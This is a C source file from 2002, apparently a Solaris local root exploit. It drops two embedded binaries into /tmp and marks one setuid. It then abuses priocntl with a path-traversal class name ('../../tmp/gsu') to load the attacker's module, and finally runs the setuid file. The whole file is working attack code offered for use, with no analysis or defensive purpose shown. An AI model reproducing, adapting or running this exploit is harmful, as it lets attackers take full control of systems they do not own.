/*
 * Copyright (C) 2001-2002 by jerryhj.
 */
#pragma ident "@(#)$Id: rgsu.c,v 0.0.0.1 2002/05/24 $"

#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/procset.h>
#include <sys/priocntl.h>
#include <sys/iapriocntl.h>
#include <errno.h>

#define GSULEN 0x000015bc
#define HJSULEN 0x00001a20
extern char gsu[];
extern char hjsu[];

int main()
{
	pcinfo_t	pcinfo;
	FILE *p;
	char *gsu_name = "/tmp/gsu";
#ifdef GSU64
	if(mkdir("/tmp/sparcv9",0777) == -1) {
		printf("create /tmp/sparcv9 error![errno = %d]\n",errno);
		return -1;
	}
	gsu_name = "/tmp/sparcv9/gsu";
#endif
	if((p = fopen(gsu_name,"w")) == 0) {
		printf("create /tmp/gsu error![errno = %d]\n",errno);
		return -1;
	}
	if(fwrite(gsu,GSULEN,1,p) == 0) {
		printf("write to /tmp/gsu error![errno = %d]\n",errno);
		return -1;
	}
	fclose(p);
	
	if((p = fopen("/tmp/hjsu","w")) == 0) {
		printf("create /tmp/hjsu error![errno = %d]\n",errno);
		return -1;
	}
	if(fwrite(hjsu,HJSULEN,1,p) == 0) {
		printf("write to /tmp/hjsu error![errno = %d]\n",errno);
		return -1;
	}
	fclose(p);
	
	if(chmod("/tmp/hjsu",S_ISUID|S_IXUSR|S_IXGRP|S_IXOTH) == -1) {
		printf("chmod /tmp/hjsu error![errno = %d]\n",errno);
		return -1;
	}
	
	strcpy(pcinfo.pc_clname, "../../tmp/gsu");
	priocntl(0, 0, PC_GETCID, (caddr_t)&pcinfo);
	unlink(gsu_name);
#ifdef GSU64
	rmdir("/tmp/sparcv9");
#endif	
	if(execl("/tmp/hjsu","/tmp/hjsu",NULL) == -1) {
		printf("execl /tmp/hjsu error![errno = %d]\n",errno);
		return -1;
	}
}
